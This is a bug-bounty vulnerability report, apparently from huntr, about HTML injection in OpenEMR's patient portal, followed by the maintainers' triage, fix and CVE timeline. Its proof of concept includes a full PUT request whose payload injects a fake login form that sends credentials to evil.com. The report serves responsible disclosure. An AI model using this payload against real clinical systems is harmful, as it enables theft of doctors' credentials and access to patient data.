We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Patient ability to rewrite it's own documents leads to HTML injection in openemr/openemr

Valid

Reported on

Dec 26th 2022

Description

It looks like through the PUT request, a Patient can rewrite it's own document via the fullDocument JSON parameter. In this way a malicious user patient can't override the document form and rewrite his own, also injecting valid HTML code that the Doctor would be able to see.

Proof of Concept

  • Login on http://demo.openemr.io/openemr/portal/home.php as Patient
  • Go to "My Documents section", and open for example "Insurance Info"
  • You will see a regular form, now change something in the form, and click on Save, it will trigger a PUT request on /openemr/portal/patient/api/onsitedocument/<ID> endpoint.
  • You will notice that there is a fullDocument JSON param, that value can be changed.
  • Trigger a request like this:
PUT /openemr/portal/patient/api/onsitedocument/7 HTTP/1.1
Host: demo.openemr.io

{"id":"2","pid":"1","facility":"0","provider":"0","encounter":"0","createDate":"2022-12-26 04:18:41","docType":"Insurance Info","patientSignedStatus":"0","patientSignedTime":"0000-00-00 00:00:00","authorizeSignedTime":"0000-00-00 00:00:00","acceptSignedStatus":"0","authorizingSignator":"","reviewDate":"0000-00-00 00:00:00","denialReason":"In review","authorizedSignature":"","patientSignature":"","fullDocument":"<h3>please provide your username and password:</h3><br><form method='post' action='//evil.com/login.php'>username:<input type='text' name='username' /><br />password: <input type='password'  name='password'><br /><input type='submit' value='login' /></form><br /><a href=//evil.com>click here</a><!--","fileName":"Insurance Info","filePath":"5"}
  • I've injected a malicious Form to gather credentials and a link that redirect to evil site (so 2 malicious HTML payloads)
  • Now the document looks like this:

image

  • Now to see the impact, go to the Doctor admin panel, and go to retrieve the patient documents.
  • To do that, go to Patient -> Search -> Select the Patient -> Documents and Fetch the Insurance info model from here:

image

You will see the exact file on the Doctor end

Impact

With this vulnerability, a malicious Patient can rewrite the entire document form with malicious HTML content and send it to the Doctor.

We are processing your report and will contact the openemr team within 24 hours. 9 months ago
We have contacted a member of the openemr team and are waiting to hear back 9 months ago
openemr/openemr maintainer has acknowledged this report 9 months ago
stephen waite validated this vulnerability 5 months ago

Hi @leorac, thanks for the report. A preliminary fix has been posted, https://github.com/openemr/openemr/commit/abee8d2606c706176818de25eb88a2d08b8f7fa4

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.1 which will likely be in about 2-4 weeks. After we do that, then will be ok to make CVE # and make it public.

leorac has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller marked this as fixed in 7.0.1 with commit abee8d 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 4 months ago
to join this conversation